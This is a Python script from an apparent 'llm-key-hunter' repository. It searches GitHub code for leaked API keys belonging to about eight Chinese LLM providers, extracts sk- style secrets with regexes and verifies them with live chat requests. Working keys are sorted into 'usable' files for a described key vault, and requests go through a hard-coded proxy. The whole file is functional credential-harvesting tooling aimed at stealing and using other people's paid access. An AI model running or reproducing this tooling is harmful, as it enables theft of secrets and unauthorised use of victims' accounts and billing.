- tools/scripts/llm-key-hunter: GitHub leak hunting pipeline (hunt_*, pivot miner, two-layer verify/content caches, per-provider verification) - usable_keys: verified key vault across 12 providers (deepseek, minimax, volcanoark, longcat, codingplan, zhipu free-tier, mimo, siliconflow, etc.) - .grok/skills/llm-key-hunter: operator skill for the hunt/verify/vault flow - NewAPI channel import scripts and CDP capture helpers - Result verdict buckets (excluding multi-GB blob caches and dedup dumps)
241 lines
9.9 KiB
Python
241 lines
9.9 KiB
Python
#!/usr/bin/env python3
|
|
"""Fresh GitHub hunt for Chinese coding-plan providers with no keys in pool.
|
|
|
|
These platforms have undocumented/UI-created key formats, so instead of
|
|
matching a prefix we search for their endpoint hostnames + env var names and
|
|
pull whatever credential-like strings sit nearby, then verify against the
|
|
provider's OpenAI-compatible endpoint.
|
|
|
|
Targets + endpoints (from patterns.conf / mcppla.net):
|
|
CSDN StarMap ai.csdn.net/api/model/v1
|
|
Huawei CodeArts (unknown endpoint; try codearts)
|
|
Xiaomi MiMo api.xiaomimimo.com/v1
|
|
Infini-AI cloud.infini-ai.com
|
|
JD Cloud api.jdcloud-ai.com / coding
|
|
MooreThreads code.mthreads.com
|
|
Kuaishou KwaiKAT streamlake
|
|
UCloud/Compshare compshare.cn
|
|
Anomaly/OpenCode opencode.ai
|
|
"""
|
|
import json, os, re, sys, time, subprocess, urllib.request, urllib.error, urllib.parse
|
|
from concurrent.futures import ThreadPoolExecutor, as_completed
|
|
from pathlib import Path
|
|
|
|
sys.path.insert(0, str(Path(__file__).resolve().parent))
|
|
from content_cache import ContentCache, parse_raw_url
|
|
|
|
OUT = Path("results/cn_extra"); OUT.mkdir(parents=True, exist_ok=True)
|
|
|
|
def github_token():
|
|
t = os.environ.get("GITHUB_TOKEN") or os.environ.get("GH_TOKEN")
|
|
if t: return t
|
|
try:
|
|
o = subprocess.run(["gh","auth","token"],capture_output=True,text=True,timeout=10)
|
|
if o.returncode == 0: return o.stdout.strip()
|
|
except FileNotFoundError:
|
|
pass
|
|
h = Path.home()/".config"/"gh"/"hosts.yml"
|
|
if h.exists():
|
|
for ln in h.read_text().splitlines():
|
|
ln = ln.strip()
|
|
if ln.startswith("oauth_token:"): return ln.split(":",1)[1].strip()
|
|
return None
|
|
|
|
GH = github_token() or ""
|
|
GH_PROXY = os.environ.get("GH_PROXY", "http://114.111.19.228:3389")
|
|
OPENER = None
|
|
def gh_opener():
|
|
global OPENER
|
|
if OPENER is None:
|
|
proxy = urllib.request.ProxyHandler({"http": GH_PROXY, "https": GH_PROXY})
|
|
OPENER = urllib.request.build_opener(proxy)
|
|
return OPENER
|
|
|
|
def gh_api(url):
|
|
req = urllib.request.Request(url, headers={
|
|
"Authorization": f"token {GH}", "Accept": "application/vnd.github+json",
|
|
"User-Agent": "llm-key-hunter"})
|
|
try:
|
|
with gh_opener().open(req, timeout=25) as r:
|
|
return json.loads(r.read())
|
|
except urllib.error.HTTPError as e:
|
|
if e.code in (403, 429):
|
|
reset = e.headers.get("X-RateLimit-Reset")
|
|
if reset:
|
|
w = max(int(reset)-int(time.time())+2, 2)
|
|
if w < 120: time.sleep(w); return gh_api(url)
|
|
return None
|
|
return None
|
|
except Exception:
|
|
return None
|
|
|
|
def gh_search(q, pp=100, pages=5):
|
|
for page in range(1, pages+1):
|
|
d = gh_api(f"https://api.github.com/search/code?q={urllib.parse.quote(q)}&per_page={pp}&page={page}")
|
|
if not d: return
|
|
items = d.get("items", [])
|
|
if not items: return
|
|
for it in items: yield it
|
|
if len(items) < pp: return
|
|
time.sleep(2.5)
|
|
|
|
def to_raw(u): return u.replace("github.com","raw.githubusercontent.com").replace("/blob/","/")
|
|
def fetch_raw(url):
|
|
req=urllib.request.Request(url,headers={"User-Agent":"Mozilla/5.0"})
|
|
try:
|
|
with gh_opener().open(req,timeout=20) as r: return r.read().decode("utf-8","replace")
|
|
except Exception: return ""
|
|
|
|
# Targets: (name, [search queries], verify endpoint, model guesses)
|
|
TARGETS = {
|
|
"CSDN": {
|
|
"queries": ['"ai.csdn.net"', '"csdn" "glm_for_coding"', '"CSDN_API_KEY"',
|
|
'"STARMAP_API_KEY"', '"coding.dashes.com" csdn'],
|
|
"chat": "https://ai.csdn.net/api/model/v1/chat/completions",
|
|
"models": ["glm_for_coding", "glm-4.7", "deepseek-v3"],
|
|
# keys near these configs: pull Bearer tokens / sk- values
|
|
},
|
|
"MiMo": {
|
|
"queries": ['"api.xiaomimimo.com"', '"MIMO_API_KEY"', '"MiMo-V2.5" api_key',
|
|
'"xiaomimimo" sk-'],
|
|
"chat": "https://api.xiaomimimo.com/v1/chat/completions",
|
|
"models": ["MiMo-V2.5-Pro", "MiMo-V2.5", "mimo-v2.5"],
|
|
},
|
|
"InfiniAI": {
|
|
"queries": ['"cloud.infini-ai.com"', '"INFINI_API_KEY"', '"INFINIAI_API_KEY"',
|
|
'"infini-ai.com" sk-'],
|
|
"chat": "https://cloud.infini-ai.com/maas/v1/chat/completions",
|
|
"models": ["deepseek-v3.2", "deepseek-v3", "qwen3", "glm-4.7"],
|
|
},
|
|
"JDCloud": {
|
|
"queries": ['"JD_API_KEY"', '"JDCLOUD_API_KEY"', '"jdcloud" "codingplan"',
|
|
'"coding.jdcloud"'],
|
|
"chat": "https://api.jdcloud-ai.com/v1/chat/completions",
|
|
"models": ["deepseek-v3", "glm-4.7"],
|
|
},
|
|
"MThreads": {
|
|
"queries": ['"code.mthreads.com"', '"MTHREADS_API_KEY"', '"mthreads" api_key'],
|
|
"chat": "https://code.mthreads.com/api/v1/chat/completions",
|
|
"models": ["glm-4.7", "deepseek-v3"],
|
|
},
|
|
"Kuaishou": {
|
|
"queries": ['"KWAIKAT_API_KEY"', '"STREAMLAKE_API_KEY"', '"streamlake" coding',
|
|
'"KAT-Coder" api_key'],
|
|
"chat": "https://api.streamlake.com/v1/chat/completions",
|
|
"models": ["KAT-Coder-Pro-V1", "deepseek-v3"],
|
|
},
|
|
"UCloud": {
|
|
"queries": ['"COMPSHARE_API_KEY"', '"UCLOUD_API_KEY"', '"compshare.cn"',
|
|
'"cucloud" coding plan'],
|
|
"chat": "https://api.compshare.cn/v1/chat/completions",
|
|
"models": ["glm-5.2", "kimi-k2.6", "deepseek-v3"],
|
|
},
|
|
"Anomaly": {
|
|
"queries": ['"ANOMALY_API_KEY"', '"OPENCODE_GO_KEY"', '"opencode.ai/go"',
|
|
'"anomaly" api_key sk-'],
|
|
"chat": "https://api.opencode.ai/v1/chat/completions",
|
|
"models": ["grok-4.5", "glm-5.2"],
|
|
},
|
|
}
|
|
|
|
# credential extraction: env var assignments + Bearer tokens + sk- values
|
|
CRED_RE = re.compile(
|
|
r'(?:sk-[A-Za-z0-9_\-]{24,}' # sk- style
|
|
r'|[A-Z][A-Z0-9_]{6,}["\']?\s*[:=]\s*["\']?[A-Za-z0-9_\-]{24,}' # KEY="value"
|
|
r'|Bearer\s+([A-Za-z0-9_\-\.]{24,}))')
|
|
SK_RE = re.compile(r'sk-[A-Za-z0-9_\-]{24,}')
|
|
FAKES = ("xxxx","your-","example","placeholder","changeme","1234567890","abcdef")
|
|
|
|
def extract_creds(text):
|
|
creds = set()
|
|
for m in SK_RE.findall(text or ""):
|
|
if not any(f in m.lower() for f in FAKES):
|
|
creds.add(m)
|
|
return creds
|
|
|
|
def verify(name, endpoint, models, key):
|
|
for model in models:
|
|
body = json.dumps({"model":model,"messages":[{"role":"user","content":"hi"}],
|
|
"max_tokens":5}).encode()
|
|
req = urllib.request.Request(endpoint, data=body, headers={
|
|
"Authorization":f"Bearer {key}","Content-Type":"application/json"}, method="POST")
|
|
try:
|
|
with urllib.request.urlopen(req,timeout=15) as r:
|
|
b=r.read().decode("utf-8","replace")
|
|
if r.getcode()==200 and ('"choices"' in b or '"message"' in b):
|
|
return "USABLE", f"[{model}] 200 {b[:100]}"
|
|
except urllib.error.HTTPError as e:
|
|
b=""
|
|
try: b=e.read().decode("utf-8","replace")[:160]
|
|
except: pass
|
|
if e.code==401: return "DEAD", f"401: {b}"
|
|
if e.code in (402,429): return "NO_BALANCE", f"{e.code}: {b}"
|
|
# 404 endpoint wrong / 400 model wrong -> try next
|
|
continue
|
|
except Exception as e:
|
|
return "UNKNOWN", f"net {type(e).__name__}: {e}"
|
|
return "NO_ACCESS", "all models failed/404"
|
|
|
|
def main():
|
|
if not GH:
|
|
print("need GH_TOKEN"); sys.exit(1)
|
|
all_usable=[]
|
|
for name,cfg in TARGETS.items():
|
|
print(f"\n{'='*60}\n[{name}] searching GitHub...",flush=True)
|
|
files={}
|
|
for q in cfg["queries"]:
|
|
print(f" query: {q}",flush=True)
|
|
try:
|
|
for it in gh_search(q):
|
|
u=it.get("html_url","")
|
|
if u and u not in files:
|
|
files[u]=it.get("repository",{}).get("full_name","?")
|
|
except Exception as e:
|
|
print(" err",e)
|
|
print(f" candidate files: {len(files)}",flush=True)
|
|
creds={}
|
|
with ContentCache() as cc:
|
|
def cfetch(url):
|
|
repo,sha,path=parse_raw_url(url)
|
|
if repo and sha and path:
|
|
t=cc.get(repo,path,sha)
|
|
if t is not None: return t
|
|
t=fetch_raw(url)
|
|
if t: cc.put(repo,path,sha,t)
|
|
return t
|
|
return fetch_raw(url)
|
|
with ThreadPoolExecutor(max_workers=16) as pool:
|
|
futs={pool.submit(cfetch,to_raw(u)):(u,r) for u,r in files.items()}
|
|
for fut in as_completed(futs):
|
|
u,r=futs[fut]
|
|
try: txt=fut.result()
|
|
except: txt=""
|
|
for c in extract_creds(txt):
|
|
if c not in creds: creds[c]=u
|
|
print(f" extracted {len(creds)} unique sk- creds",flush=True)
|
|
if not creds: continue
|
|
# verify
|
|
buckets={"USABLE":[],"DEAD":[],"NO_BALANCE":[],"NO_ACCESS":[],"UNKNOWN":[]}
|
|
with ThreadPoolExecutor(max_workers=12) as pool:
|
|
futs={pool.submit(verify,name,cfg["chat"],cfg["models"],k):(k,s)
|
|
for k,s in creds.items()}
|
|
for fut in as_completed(futs):
|
|
k,s=futs[fut]
|
|
try: v,d=fut.result()
|
|
except Exception as e: v,d="UNKNOWN",str(e)
|
|
buckets[v].append((k,s,d))
|
|
for v in buckets:
|
|
with (OUT/f"{name}_{v.lower()}.txt").open("w") as f:
|
|
for k,s,d in buckets[v]: f.write(f"{k}|{s}|{d}\n")
|
|
print(f" usable={len(buckets['USABLE'])} dead={len(buckets['DEAD'])} "
|
|
f"nobal={len(buckets['NO_BALANCE'])} noacc={len(buckets['NO_ACCESS'])}",flush=True)
|
|
for k,s,d in buckets["USABLE"]:
|
|
print(f" USABLE {k[:40]} <- {s}\n {d[:120]}")
|
|
all_usable.append((name,k,s,d))
|
|
print(f"\n\n=== ALL USABLE: {len(all_usable)} ===")
|
|
with (OUT/"all_usable.txt").open("w") as f:
|
|
for name,k,s,d in all_usable: f.write(f"{name}|{k}|{s}|{d}\n")
|
|
|
|
if __name__=="__main__":
|
|
main()
|